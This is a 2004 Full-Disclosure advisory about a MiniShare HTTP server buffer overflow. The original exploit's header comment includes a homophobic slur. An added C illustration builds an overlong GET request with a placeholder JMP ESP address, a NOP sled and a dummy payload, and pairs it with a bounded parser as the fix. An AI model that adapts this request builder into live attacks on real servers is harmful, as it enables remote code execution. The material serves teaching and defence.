[Full-Disclosure] [Advisory + Exploit] MiniShare, Minimal HTTP Server for Windows, Remote Buffer Overflow Exploit
From: class 101 (class101 phreaker.net)
Date: Sun Nov 07 2004 - 09:41:21 CST
Hi List,
I found this bug yesterday in the latest version of MiniShare.
This is a simple buffer overflow in the address link.
The vendors were contacted at http://minishare.sourceforge.net
only 1 hour before the public advisory.
Actually no fix is available. The exploit is attached for the list people, and available at dfind.kd-team.com, my homepage.
class101
/*
MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.
Binds a shellcode to port 101.
Full disclosure and exploit
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
07 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
------------------
WHAT IS MINISHARE
------------------
Homepage - http://minishare.sourceforge.net/
MiniShare is meant to serve anyone who needs to share files with anyone,
doesn't have a place to store the files on the web,
and does not want or simply does not have the skill
and possibility to set up and maintain complete HTTP server software...
--------------
VULNERABILITY
--------------
A simple buffer overflow in the link length, nothing more;
read the code for further instructions.
----
FIX
----
Actually none; the vendor was contacted the same day this was published, 1 hour before you.
As a nice fuck-you to NGSS, iDEFENSE and all the other private disclosure
homo crews, as well as K-OTiK, who are jerking off in their "Lab"
lol :->
----
EXTRA
----
Update the JMP ESP if you need to. A wrong offset will crash MiniShare.
Code tested and working on MiniShare 1.4.1 with WinXP SP1 English, Win2k SP4 English and WinNT SP6 English.
Other MiniShare versions aren't tested.
Tip: If it crashes for you, try playing with Sleep()...
----
BY
----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
who
greets
DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet
*/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- application/octet-stream attachment: 101_mini.cpp
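Added illustration, not part of the original post: the code below is neither the attached 101_mini.cpp nor MiniShare's own source. It shows the shape of the technique the header comment describes (an over-long URL in the GET request line overwrites the saved return address, which is replaced by the address of a JMP ESP so execution lands on the shellcode that follows), and beside it the bounded request-line parser that closes that class of bug. The offset to the return address (OFFSET_TO_RET), the JMP ESP address and the shellcode bytes are placeholders chosen for illustration and are not the values for MiniShare 1.4.1; the real ones are found in a debugger against the target, which is exactly why the advisory warns that a wrong offset crashes the server.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Placeholder values for illustration only. They are NOT the offset or the
 * JMP ESP address used against MiniShare 1.4.1 in 101_mini.cpp; both must
 * be determined by debugging the actual target and OS build. */
#define OFFSET_TO_RET   1787u          /* hypothetical: URL bytes before saved EIP */
#define JMP_ESP_ADDR    0x7c941eedu    /* hypothetical: address of a JMP ESP gadget */
#define NOP_SLED_LEN    16u

/* Stand-in for a real payload: INT3 breakpoints instead of a port-101 bind shell. */
static const unsigned char fake_shellcode[] = { 0xCC, 0xCC, 0xCC, 0xCC };

/* Build "GET /<junk><ret><nop sled><shellcode> HTTP/1.1\r\n\r\n".
 * Junk fills the stack up to the saved return address, which is overwritten
 * with the JMP ESP address. After the function returns, ESP points just past
 * that address, so JMP ESP lands on the NOP sled and slides into the payload.
 * *out receives a malloc'd buffer; the return value is its length (0 on error).
 * Caveat: any 0x00, 0x20, 0x0d or 0x0a inside the address or payload would
 * terminate the URL early in a real HTTP parser and must be avoided. */
size_t build_overflow_request(unsigned char **out, uint32_t jmp_esp,
                              size_t offset, const unsigned char *sc, size_t sc_len)
{
    static const char prefix[] = "GET /";
    static const char suffix[] = " HTTP/1.1\r\n\r\n";
    size_t body  = offset + 4 + NOP_SLED_LEN + sc_len;
    size_t total = (sizeof prefix - 1) + body + (sizeof suffix - 1);
    unsigned char *buf = malloc(total);
    if (!buf) return 0;

    unsigned char *p = buf;
    memcpy(p, prefix, sizeof prefix - 1);  p += sizeof prefix - 1;
    memset(p, 'A', offset);                p += offset;
    /* x86 is little-endian: least significant byte of the address first. */
    for (int i = 0; i < 4; i++)
        *p++ = (unsigned char)((jmp_esp >> (8 * i)) & 0xff);
    memset(p, 0x90, NOP_SLED_LEN);         p += NOP_SLED_LEN;
    memcpy(p, sc, sc_len);                 p += sc_len;
    memcpy(p, suffix, sizeof suffix - 1);
    *out = buf;
    return total;
}

/* The fix side: parse the request line with an explicit bound on the URL
 * instead of copying it into a fixed-size stack buffer with no length check
 * (the class of bug the advisory describes). Returns 1 and fills url on
 * success, 0 if the method/format is wrong or the URL would not fit in
 * url_cap-1 bytes. Over-long input is rejected, not silently truncated. */
int parse_request_line(const unsigned char *req, size_t req_len,
                       char *url, size_t url_cap)
{
    static const char method[] = "GET ";
    size_t mlen = sizeof method - 1;
    if (req_len < mlen || memcmp(req, method, mlen) != 0) return 0;

    const unsigned char *start = req + mlen;
    const unsigned char *end   = memchr(start, ' ', req_len - mlen);
    if (!end) return 0;

    size_t ulen = (size_t)(end - start);
    if (ulen == 0 || ulen >= url_cap) return 0;
    memcpy(url, start, ulen);
    url[ulen] = '\0';
    return 1;
}

int main(void)
{
    unsigned char *req;
    char url[256];
    size_t n = build_overflow_request(&req, JMP_ESP_ADDR, OFFSET_TO_RET,
                                      fake_shellcode, sizeof fake_shellcode);
    printf("overflow request: %zu bytes, bounded parser accepts it: %d\n",
           n, parse_request_line(req, n, url, sizeof url));
    const char *ok = "GET /index.html HTTP/1.1\r\n\r\n";
    printf("normal request accepted: %d (url=%s)\n",
           parse_request_line((const unsigned char *)ok, strlen(ok), url, sizeof url), url);
    free(req);
    return 0;
}
```

The builder makes the layout explicit: everything before the four address bytes is only padding to reach the saved EIP, and the sled after them is what gives the JMP ESP some tolerance. The parser shows the minimal server-side fix: a hard cap on the URL length, with rejection rather than truncation, so the request can never write past the destination buffer.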